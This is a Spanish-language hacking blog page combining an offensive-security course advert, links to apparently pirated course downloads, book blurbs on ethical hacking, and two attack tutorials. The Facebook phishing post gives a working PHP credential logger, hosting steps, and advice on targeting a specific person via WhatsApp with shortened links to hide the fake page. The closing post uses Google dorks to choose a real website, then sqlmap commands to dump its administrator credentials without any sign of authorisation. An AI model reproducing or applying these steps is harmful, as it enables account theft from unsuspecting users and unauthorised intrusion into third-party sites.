.

WHAT'S NEW?
Loading...
Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta hacking. Mostrar todas las entradas

La demanda por gente especializada en seguridad informática es cada vez mas alta, los mejores empleos son para la gente capacitada, y si bien sabemos la realidad hoy en día un papel o diploma NO GARANTIZA conocimientos, sin embargo a la hora de las entrevistas laborales son las que mas peso tienen.
Es por eso que hemos diseñado este curso con toda nuestra experiencia en Seguridad Informática (mas de 15 años) para acelerar el aprendizaje y entender los conceptos de forma practica.
Antes de tomar una certificación, pregunta a tus conocidos, hay algunas muy comerciales como CEH (Certified Ethical Hacker) donde sus cursos son vídeos de diapositivas con definiciones de Wikipedia, nosotros te enseñamos las técnicas en VIVO, el curso es 100% practico con ejemplos reales.
Aprenderás la filosofía de la Seguridad Ofensiva que se enfoca en adentrarse a la manera de pensar del atacante.

El curso comienza desde las bases de instalación de software y laboratorios virtuales, hasta ataques web e ingeniería inversa. No vamos a mentirte, la seguridad informática es una forma de vida, y con 1 solo curso que tomes no podrás dominarle, sin embargo tendrás las bases para poder iniciar tu carrera como Pentester y hacer tus propias investigaciones digitales.
Este curso es presencial en la Ciudad de México , se otorga diploma con valor curricular, impreso en papel fotográfico de alta calidad, con firmas, sellos y holograma de autenticidad.







Bueno pues gente desde hace tiempo que no entro a publicar , debido a varios factores :(.Además también deje de darle update a mis scripts u.u , nunca se enamore crj ajjaja .Bueno comenzare.

Bueno sera facil crearlo , a continuación comenzare : 

Ingresamos a www.facebook.com normalmente como lo hacemos siempre.


Una vez aqui pulsamos la conbinacion de teclas magicas :v los cuales seria <Ctrl+S> y se nos abre una pestaña , guardamos los archivos en donde nosotros queramos , pero tenemos que editar el codigo que esta dentro de este archivo html <Facebook - Inicia sesión o regístrate.html> con el codigo fuente de la pagina de facebook.com.La copiamos toditita con <Ctrl+A> .Debido a que si no hacemos esto creo que no carga el css o lo bonito de la pagina.

Una vez realisado este primer paso , procederemos a ver como hacer que las credenciales introducidas a la pagina que subiremos luego a un hosting [FREE] nos guarde las credenciales.

Lo realizaremos mediante el uso de php, pero antes editaremos la pagina <Facebook - Inicia sesión o regístrate.html> , pueden abrirla con un block de notas o mejor aun con DreamWeaver o tambien con sublime text , que tenga un buscador.



Listo , una vez adentro de nuestro block o vim,nano,sublime text , lo que sea.Pasamos a buscar lo siguiente : [action="]



Lo que nos interesa por ahora es lo siguiente : 

action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110"
Si desean saber algo mas podrian leer de formularios en html :D  les dejo un link ->

FORMULARIOS HTML

Una ves realizado este cambio al momento de guardarlo , guardenlo como -> "index.html"

Bueno el action yo diria que vendria a ser el que va a gestionar los datos que mandemos , por ejemplo aqui el que ta gestionando las credenciales introducidas es "login.php".

Ahora lo que haremos sera editarlo !

action="gestionar.php" <- el nombre depende como guardaron el script que gestionara las credenciales que se introduciran.
Pero que ! , que tiene ese script "gestionar.php"?

Pues el archivo "gestionar.php" tiene el siguiente codigo :


<?php
if (!empty($_POST['email']) && !empty($_POST['pass'])){
$usuario = $_POST['email'];
$contra = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$archivo = fopen('log.txt','a+');
fwrite($archivo,"Usuario : " . $usuario . "\n" . "Contraseña :" . $contra . "\n" . "Ip : " . $ip ."\n");
fclose($archivo);
header('Location : http://www.facebook.com/');
}else{
header('Location : /');
}

?>
PASARE A EXPLICAR UN POQUITO EL CODE

El primer if verifica si no estan vacios el parametro "email" y "pass" entonces ejecutara todo en cambio si esta vacio con el header lo que hace es una redireccion a la parte principal de la web "/" por eso el slash.

$usuario = $_POST['email']; <- almacena el email  
Una aclaracion el "email" diran de donde salio ? pues es del formulario que esta en la pagina.Lean formularios en html y pues lo entendera y si lo entendieron pues manitas arriba ! (y)  

Y pues asi todo , luego se realiza un uso de fwrite para crear una archivo o si ya esta creado sobre escribirlo con "a+" , lo que se almacena en dicho archivo llamado "log.txt" sera el "Usuario,Contraseña,Ip"

Ok, listo tenemos ya casi todo , ahora falta suvir a un hosting [FREE] o si desean gastar dinero compren.

Recomiendo que se creen una cuenta aqui :

www.000webhost.com/

No explicare como se crea porque , supongo que es facil -.-.
Esta seria la interfaz una ves creada la cuenta y logeados claro !



Para no alargar este post , clickeamos en "File manager" y luego en "subir archivos".

Nos saldra lo siguiente :

Como podemos observar , todo esta vacio ! lo unico que tenemos que hacer es arrastrar todos los archivos que creamos y descargamos ! a la parte blanca y listo ! se suvira automáticamente.



Y pues listo ! Tenemos todo supido al hosting !
Entramos a nuestra direccion la cual declaramos al momento de registrarnos ! 
Introducire datos al azar pa probar el pishing y pues le damos en "iniciar session".


Y luego nos vamos a el archivo log.txt en donde se almacenan las credenciales introducidas y la ip , ya se explico como se procede todo esto o como se realiza en la parte de arriba.Visualizando el archivo "log.txt":


Una recomendacion !
Si desean enviar su link a una persona en especifico usen otras redes por ejemplo whastapp y ademas pueden usar acortadores de url para que no sea posible identificar el pishing "url".Ya queda en ustedes con su flor ! saludos !

Los mejores cursos de Backtrack Academy totalmente gratis en nuestro blog para todos nuestros seguidores y apasionados del hacking en español...

 

Acerca de este curso

Cuando los sistemas informáticos y recursos de una compañía están bien protegidos es común que se utilicen técnicas de ingeniería social para lograr evadir esas protecciones y así poder acceder a los recursos protegidos. La ingeniería social se trata de comprometer a los humanos que utilizan esos sistemas informáticos.

Valor en la pagina : 18 Dolares

DESCARGAR GRATIS 


Acerca de este curso

Mastering Metsploit es un curso que muestra la estructura de Metasploit para entender como funciona este framework de manera que desarrollaremos nuestros propios módulos e incluso podremos modificar los que ya existen. Posteriormente veremos módulos de explotación, post explotación y desarrollo de exploits.

Valor en la pagina : 18 Dolares

DESCARGAR GRATIS 


Acerca de este curso

Durante las fases previas se ha logrado recabar información sobre el objetivo. Si se trata de un pentesting externo esto implica que hemos llegado hasta identificar el rango de direcciones IP’s públicas asignadas a nuestro cliente y posiblemente hemos identificado algunos equipos individuales y sus respectivas IP’s.

Valor en la pagina : 18 Dolares

DESCARGAR GRATIS 

Acerca de este curso

Este curso de proporciona el conocimiento necesario para que el usuario sea capaz de entender uno de los principales métodos de ataques de “Hackers” de hoy en día. No son simples búsquedas, se puede llevar a cabo un ataque elaborado sabiendo cómo hacerlo. Aprende a buscar vulnerabilidades en tus sistemas sin tener más herramientas que internet.

Valor en la pagina : 18 Dolares

DESCARGAR GRATIS 


Acerca de este curso

La Protección de Datos Personales, tiene como objeto garantizar el derecho fundamental a los datos personales, realizando para ello un adecuado tratamiento de los mismos. Ello implica el respeto a los derechos fundamentales reconocidos por los países de América Latina.
Valor en la pagina : 18 Dolares

DESCARGAR GRATIS

Acerca de este curso

Las bases de datos son los lugares donde se almacena la información más importante de una organización. Si una base de datos se viera comprometida se ve afectada la integridad, disponibilidad y confidencialidad de la información. Las afectaciones recaen en afectaciones a la imagen y credibilidad de la empresa, pérdidas económicas, robo de identidad, sanciones administrativas.
Valor en la pagina : 18 Dolares

DESCARGAR GRATIS

Acerca de este curso

El curso de powershell enfocado a seguridad informática está diseñado para entender como esta conformado y como programar en este lenguaje, además del uso de comandos de esta consola de scripting ya que powershell es un lenguaje de programación y a su vez es una consola de scripting que nos ofrece un gran abanico de posibilidades en hacking.
Valor en la pagina : 18 Dolares

DESCARGAR GRATIS







La seguridad informática ha ganado popularidad en los últimos años y ha pasado de ser considerada un gasto, a ser vista como una inversión por parte de los directivos de las empresas y organizaciones a nivel mundial.

En algunos países esto ha sucedido de forma acelerada, en otros el paso ha sido más lento; pero en última instancia hemos convergido todos en un mundo digital en el que la información es el activo intangible más valioso con el que contamos.

Y al ser un activo, debemos protegerlo de posibles pérdidas, robos, mal uso, etc. Es aquí en donde juega un papel preponderante un actor antes desconocido: el hacker ético.

El rol del hacker ético es efectuar – desde el punto de vista de un cracker – un ataque controlado hacia la infraestructura informática de un cliente, detectando vulnerabilidades potenciales y explotando aquellas que le permitan penetrar las defensas de la red objetivo, pero sin poner en riesgo los servicios y sistemas auditados. Y todo esto con el solo propósito de alertar a la organización contratante de los riesgos de seguridad informática presentes y cómo remediarlos.

Este individuo debe tener la capacidad de saber cuándo es mejor no explotar un hueco de seguridad y solamente reportarlo al cliente Vs cuándo es preciso ejecutar un exploit para demostrar la gravedad de la vulnerabilidad. Es una mezcla entre la mente criminal de Hannibal, las acciones de la Madre Teresa y el background profesional de un verdadero nerd!

¿Pero dónde encontramos a estos héroes? La respuesta a esta pregunta se torna cada vez más difícil si creemos en los estudios realizados por importantes empresas consultoras, que indican que año a año se ensancha la brecha entre la demanda y la oferta de profesionales certificados en seguridad informática.

Y es por este motivo que se vuelve esencial contar con profesionales de tecnología entusiastas, pero sobre todo con altos valores éticos y morales, que estén dispuestos a aceptar el desafío de convertirse en pentesters.

Este libro es para ellos.

Así que si el estimado lector encaja en este perfil, entonces este libro es para usted.

No se requieren conocimientos previos de hacking ético, el nivel del libro es introductorio y por ende parte de cero en dicha área; no obstante es imprescindible tener una formación base en sistemas computacionales o tecnologías de la información.

¿Cuáles son los requisitos?

Conocer el modelo OSI y sus diferentes capas.
Poseer nociones sobre la arquitectura TCP/IP (direccionamiento IPv4, subnetting, enrutamiento, funcionamiento de protocolos como ARP, DNS, HTTP, SMTP, DHCP, etc).
Saber usar y administrar sistemas Windows y
¿Cómo está dividido el libro?

El libro se desarrolla en 7 capítulos y hemos calculado que el estudiante deberá invertir alrededor de 21 días para completarlos, con un tiempo de dedicación mínimo de 2 horas diarias. Sin embargo, el lector es libre de avanzar a su propio paso y tomarse mayor o menor tiempo.

Mi única sugerencia es que deben realizarse todos los laboratorios propuestos, inclusive con diferentes sistemas operativos víctimas a los referidos por esta servidora. Es en la variación de escenarios y en la práctica continua que se gana experiencia.


                    



Lejos de definiciones formales, la seguridad informática propone un modo distinto de ver la realidad, una perspectiva diferente, casi una filosofía de vida. Es una disciplina en la que resulta imposible adentrarse sin recurrir al sentido de la curiosidad y la creatividad. Desde ese misterioso lugar es que, capítulo tras capítulo, hemos intentado transmitir una parte de nuestra experiencia, la llave de una puerta que una vez atravesada nunca podrá ignorarse, el mapa de un camino que solo habrá de recorrerse con pasión y determinación.
De ningún modo hemos pretendido escribir un texto bíblico ni un conjunto de información novedosa, sino más bien un manual de consulta y de referencia, serio y de calidad, con recursos bibliográficos navegables por la web y con contenidos amenos y atractivos que fomenten su fácil lectura, tanto para quienes recién se inician en el tema como para aquéllos que ya conocen algo de él.
A lo largo de los capítulos, hemos intentado cubrir los temas fundamentales que hacen a la seguridad informática orientada al ethical hacking: comenzamos por la más elemental introducción a los conceptos necesarios, pasamos por la explicación de las distintas fases de un ataque (subdividida en etapas más simples) y por el mundo de Internet y las tecnologías web, hasta que llegamos a temas más específicos, como el control de accesos, o más amplios y complejos, como las infraestructuras de red.
También abordamos aspectos menos técnicos, pero no menos importantes, en un capítulo especialmente dedicado a los ataques sin tecnología.
Somos conscientes de que existe una gran cantidad de temas que han tenido que quedar fuera de esta obra y esa selección ha sido uno de los desafíos más complicados que tuvimos que enfrentar, por lo que incluso nosotros somos los primeros que nos hemos quedado con ganas de más.
Sin más preámbulos, les damos la bienvenida al vasto universo de la seguridad informática y esperamos que este libro sea de su agrado.
Este libro plantea de forma clara y amena los fundamentos de la seguridad informática orientados al ethical hacking. No pretende ser un conjunto de tutoriales con pasos predefinidos, como si se tratara de una receta de cocina para utilizar determinada aplicación, sino que se propone profundizar en conceptos y detalles.
Contenido:
Capítulo 1. Introducción
Capítulo 2. Espionaje corporativo
Capítulo 3. Ethical hacking
Capítulo 4. Seguridad física y biometría
Capítulo 5. Amenazas en entornos web
Capítulo 6. Infraestructura de redes
Capítulo 7. Marco legal
Capítulo 8. Penetration testing
Capítulo 9. Metodologías de análisis
Servicios. Al lector


Clave de cifrado



Lo primero es usar google dorks que son simples comandos de busqueda inteligente mediante google

estas dos son algunas Google dorks que existen pero solamente usaremos estas
intext: es para buscar una web especifica buscara que tenga un texto en específico
inurl: buscara la extensión denominada

buscando elegimos una web a testear y dimos con esta

y testeamos poniendo un simple amperson al final de la URL y damos enter así...

vemos qué al poner el amperson ( ' ) y damos enter arroja un error de SQL una vez veamos esa vulnerabilidad comenzamos con el ataque

Utilizaremos la herramienta SQL MAP - es una tool desarrollada para Linux esta vez la utilizaremos en Windows y accedemos a su directorio.
 y con estos primeros comandos damos por comenzado el ataque
sqlmap.py -u [URL] --dbs
Dejamos trabajar el ataque
Aqui ya nos mostro que el motor de base de datos es MySQL y que es parametro injectable


Accedemos a el sistema y nos muestra las base de datos disponibles esta vez atacaremos tacnar_radiotacna


y el comando para atacar la base de dato en especifico es
sqlmap.py -u [url] -D [database Name ] --tables
una vez terminado nos muestra las tablas que contiene la base de datos
una vez en la base de datos buscas sacar los datos de una tabla  aqui la que mas me llamo la atención es la de administrador y la atacamos con los siguientes comandos
sqlmap.py -u [url] -D [databaseName] -T [TableName] -- dump

y bien logramos dumpear el usuario y contraseña de administrador de la pagina web.